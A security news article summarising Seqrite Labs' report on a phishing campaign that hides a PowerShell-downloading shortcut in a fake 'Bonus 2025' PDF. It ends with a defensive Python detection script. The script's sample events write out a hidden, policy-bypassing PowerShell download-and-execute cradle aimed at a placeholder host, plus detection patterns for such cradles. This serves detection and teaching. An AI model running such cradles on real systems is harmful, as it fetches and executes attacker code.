Seqrite Flags DupeHike Espionage Campaign

Seqrite Labs has exposed a targeted cyber‑espionage campaign, dubbed Operation DupeHike, that abuses routine HR bonus communications to infiltrate Russian enterprises. By disguising multi‑stage malware as a “Bonus 2025” document and abusing trusted tools like PowerShell, the UNG0902 threat group is demonstrating how everyday workflows can be weaponised against finance, HR, and administrative teams at scale.

How Operation DupeHike Works

The campaign begins with convincing emails about annual bonuses, framed as 15% of salary and referencing performance rules that mirror standard HR language. Attached is a ZIP archive containing a Windows shortcut (.lnk) file dressed up as a benign PDF; opening it silently runs a PowerShell command that downloads the first malware stage from a remote server. The disguise works because Windows never displays the .lnk extension, so a shortcut carrying a document-style name and a PDF icon is indistinguishable from a real PDF at a glance.

This “loader” then pulls a second payload masquerading as a font file, which inspects running processes such as Notepad or Microsoft Edge and injects itself into them for stealth. Once established, it deploys AdaptixC2, a remote access framework that allows attackers to exfiltrate files, monitor activity, and execute commands, effectively turning compromised machines into espionage footholds inside corporate networks.

Infrastructure, Evasion and Tradecraft

Seqrite’s APT research team detected Operation DupeHike on 21 November 2025, tracing the malicious infrastructure to Russian hosting providers. The attackers initially used exposed web ports and then shifted to more secure configurations after detection, signalling active operational security and agility in response to scrutiny.

The tradecraft follows a classic multi‑step pattern: well-crafted social lure, shortcut abuse, hidden download, process injection, and remote control. By pivoting quickly between open and encrypted channels, UNG0902 reduces the chances of simple network‑based detection while maintaining persistent control over infected endpoints.

Why HR, Payroll and Admin Are Prime Targets

The campaign zeroes in on HR, payroll, and internal admin teams—functions that routinely handle salary, personal data, and policy communications. Because staff in these departments expect bonus notifications and attachments, they are more likely to trust and open such files, allowing the lure to bypass basic user suspicion.

Compromise in these areas is particularly damaging: attackers can access sensitive PII, payroll records, and internal documentation, and may use hijacked accounts to launch secondary attacks across finance, leadership, or wider employee bases. The campaign underscores that “back‑office” teams are now front‑line targets in espionage and fraud operations.

Defensive Lessons and Recommended Controls

Seqrite advises enterprises that no organisation is immune to such context‑aware campaigns and that basic technical controls must be paired with user vigilance. Recommended measures include regular awareness programmes that train employees to question unexpected attachments—even from HR—verify via secondary channels, and treat bonus or policy emails as potential phishing vectors.

On the technical side, organisations should restrict PowerShell usage, monitor for suspicious or unsigned script execution, enforce least privilege on endpoints, and deploy behavioural tools capable of detecting code injection and abnormal process activity. Enabling PowerShell script block and module logging is the practical precondition for the monitoring step: without it, a download cradle hidden behind an encoded command line leaves little for the SOC to match on. Seqrite has rolled out protection updates across its product portfolio, blocking the identified components of Operation DupeHike, and is sharing indicators of compromise with customers and law enforcement to help dismantle the attacker infrastructure.
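As an added illustration of the two points above, the lure chain (ZIP carrying a shortcut that poses as a PDF and launches a PowerShell download cradle) and the recommended monitoring, the following script is example code written for this page, not Seqrite's detection logic or anything from the published report. It scores process-creation events for the shortcut-to-PowerShell pattern, decodes `-EncodedCommand` payloads before matching, and inspects archive members both by name and by the shell-link file header. The event fields are modelled on Sysmon Event ID 1 (ProcessCreate); all sample events, the archive, the filenames and the 203.0.113.10 URL are constructed placeholders, not indicators from the campaign.

```python
"""Detection helpers for a mailed ZIP whose shortcut (.lnk) poses as a PDF and
runs a PowerShell download cradle. Added example, not Seqrite's code. Event
fields are modelled on Sysmon Event ID 1 (ProcessCreate); every sample below
is constructed and the host/URL is a documentation placeholder."""
import base64
import io
import re
import zipfile
from typing import Optional

# Shell link (.lnk) header: HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046, both little-endian as stored on disk.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")

# Explorer never shows the .lnk extension, so "<doc>.pdf.lnk" renders as "<doc>.pdf".
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", re.IGNORECASE)

# Switches and cmdlets that, together, make up a typical one-line cradle.
INDICATORS = {
    "hidden_window":   re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b"),
    "no_profile":      re.compile(r"(?i)-nop(?:rofile)?\b"),
    "policy_bypass":   re.compile(r"(?i)-e(?:xecution)?p(?:olicy)?\s+bypass"),
    "encoded_command": re.compile(r"(?i)-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}"),
    "download_cradle": re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|"
                                  r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|"
                                  r"Start-BitsTransfer"),
    "in_memory_exec":  re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext of a -EncodedCommand payload (base64 of UTF-16LE)."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    blob = m.group(0).split()[-1]
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_process_event(event: dict) -> dict:
    """Score a process-creation event for the shortcut -> PowerShell cradle pattern."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"alert": False, "indicators": [], "decoded": None}
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = cmdline + (" " + decoded if decoded else "")   # match on the decoded form too
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # explorer.exe as parent means a double-click (shortcut or file association),
    # not a scheduled task, a deployment agent or an admin's existing console.
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        hits.append("spawned_by_explorer")
    fetches = {"download_cradle", "encoded_command"} & set(hits)
    alert = bool(fetches) and ("spawned_by_explorer" in hits or len(hits) >= 3)
    return {"alert": alert, "indicators": hits, "decoded": decoded}


def suspicious_archive_members(zip_bytes: bytes) -> list:
    """Return (member, reason) for shortcuts inside an archive, by name or by header."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            head = zf.read(name)[:len(LNK_MAGIC)]
            if DOUBLE_EXT_RE.search(name):
                findings.append((name, "shortcut posing as a document"))
            elif head == LNK_MAGIC:
                findings.append((name, "shell link header under a different extension"))
            elif name.lower().endswith(".lnk"):
                findings.append((name, "shortcut inside a mailed archive"))
    return findings


# Constructed samples (placeholder host from the 203.0.113.0/24 documentation range).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage1.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",      # shortcut double-clicked
     "CommandLine": 'powershell.exe -w hidden -nop -ep bypass -c "' + CRADLE + '"'},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",      # same cradle, base64-wrapped
     "CommandLine": "powershell.exe -w hidden -enc "
                    + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",  # routine admin use
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]


def build_sample_lure() -> bytes:
    """Constructed stand-in for the lure ZIP; the .lnk member is header-only, not a real shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Bonus_2025.pdf.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("Bonus_policy.pdf", b"%PDF-1.4 placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyse_process_event(ev))
    print(suspicious_archive_members(build_sample_lure()))
```

The alert condition deliberately requires a fetch indicator (a cradle cmdlet or an encoded payload) plus either an Explorer parent or several evasion switches, so a routine `-NoProfile` invocation from an administrator's console does not fire; tune the indicator list and thresholds against your own baseline of legitimate PowerShell use before deploying anything like this.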
